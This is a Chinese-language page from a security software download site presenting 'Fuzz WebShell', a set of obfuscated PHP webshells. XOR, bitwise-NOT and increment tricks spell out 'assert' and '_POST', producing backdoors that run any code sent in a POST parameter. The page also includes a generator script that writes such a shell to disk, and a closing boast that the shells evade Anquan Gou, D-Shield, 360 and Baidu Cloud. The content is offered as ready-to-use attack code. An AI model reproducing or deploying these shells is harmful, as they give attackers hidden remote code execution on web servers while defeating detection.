ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全工具 → Fuzz WebShell
Fuzz WebShell

Fuzz WebShell

评分:
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

一、使用异或 ^ 运算

  1. <?php
  2. $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
  3. $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
  4. $___=$$__;
  5. $_($___[_]); // assert($_POST[_]);

这个马是不能直接用的,因为代码中的url编码其实对应的是一个不可打印的特殊字符,这里只是为了显示程序方便,用url编码来取代

或者你还可以按照如下两种形式修改木马,使得木马可以运行。

  1. <?php
  2. $_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
  3. $__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
  4. $___=$$__;
  5. $_($___[_]);// assert($_POST[_]);
  6. ?>
  1. <?php
  2. $_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
  3. $__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
  4. $___=$$__;
  5. $_($___[_]);// assert($_POST[_]);
  6. ?>

二、使用取反 ~ 运算

  1. <?php
  2. $__=('>'>'<')+('>'>'<');
  3. $_=$__/$__;
  4. $____='';
  5. $___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
  6. $_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
  7. $_=$$_____;
  8. $____($_[_]);// assert($_POST[_]);

别惊讶 就是这样的!

  1. <?php
  2. $__=[];
  3. $___=[];
  4. $_=$__==$___;
  5. $__=~(瞰);
  6. $___=$__[$_];
  7. $__=~(北);
  8. $___.=$__[$_].$__[$_];
  9. $__=~(的);
  10. $___.=$__[$_];
  11. $__=~(半);
  12. $___.=$__[$_];
  13. $__=~(拾);
  14. $___.=$__[$_];
  15. $____=~(~(_));
  16. $__=~(说);
  17. $____.=$__[$_];
  18. $__=~(小);
  19. $____.=$__[$_];
  20. $__=~(次);
  21. $____.=$__[$_];
  22. $__=~(站);
  23. $____.=$__[$_];
  24. $_=$$____;
  25. $___($_[_]);// assert($_POST[_]);

Fuzz脚本如下:

Fuzz WebShell

另一个脚本:

  1. # generate.php 运行该程序,生成木马shell.php, assert('eval($_POST[_])');
  2. <?php
  3. file_put_contents('yihuo.php', '<?php $_=~'.(~'assert').';$__=~'.(~'eval($_POST[_])').';$_($__);?>')
  4. ?>

三、使用自增运算 ++

  1. <?php
  2.     @$_=[].'';
  3.     @$___=$_[''];
  4.     $_=$___;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  5.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  6.     $___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;
  7.     $__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  8.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;
  9.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  10.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;
  11.     $____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  12.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;
  13.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  14.     $__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;
  15.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  16.     $__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;
  17.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
  18.     $__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;
  19.     @$___($_[_]);// assert($_POST[_]);
  20. ?>

总结

既然不能使用某些字符,那么就利用PHP的一些特性来构造、拼接、执行我们想要的内容 ,这时候位运算符就派上了用场。过安全狗,过D盾,过360,过百度云,过一些!

展开内容

软件截图

下载地址

  • PC版

推荐文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网